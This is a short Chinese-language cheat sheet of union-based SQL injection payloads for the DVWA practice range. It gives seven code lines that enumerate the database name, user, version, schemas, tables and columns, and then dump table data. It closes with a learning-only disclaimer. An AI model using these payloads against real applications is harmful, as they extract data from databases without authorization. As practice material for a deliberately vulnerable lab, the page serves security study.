dvwa靶场sql注入命令大全
时间: 2023-06-30 11:06:50 浏览: 147
以下是一些常见的DVWA靶场中使用的SQL注入命令:
1. 获取当前数据库名:
```
' union select database(),null #
```
2. 获取当前用户:
```
' union select user(),null #
```
3. 获取当前版本号:
```
' union select @@version,null #
```
4. 获取所有数据库:
```
' union select group_concat(schema_name),null from information_schema.schemata #
```
5. 获取所有表:
```
' union select group_concat(table_name),null from information_schema.tables where table_schema=database() #
```
6. 获取表中所有列:
```
' union select group_concat(column_name),null from information_schema.columns where table_name='table_name' #
```
注意:其中的table_name需要替换为具体的表名。
7. 获取数据:
```
' union select group_concat(column1,column2,...),null from table_name #
```
注意:其中的column1,column2,...需要替换为具体的列名,table_name需要替换为具体的表名。
以上是一些常见的命令,但实际使用时需要根据具体情况进行调整。另外,在实际使用时,需要注意DVWA靶场仅用于学习和研究目的,不得用于非法用途。
阅读全文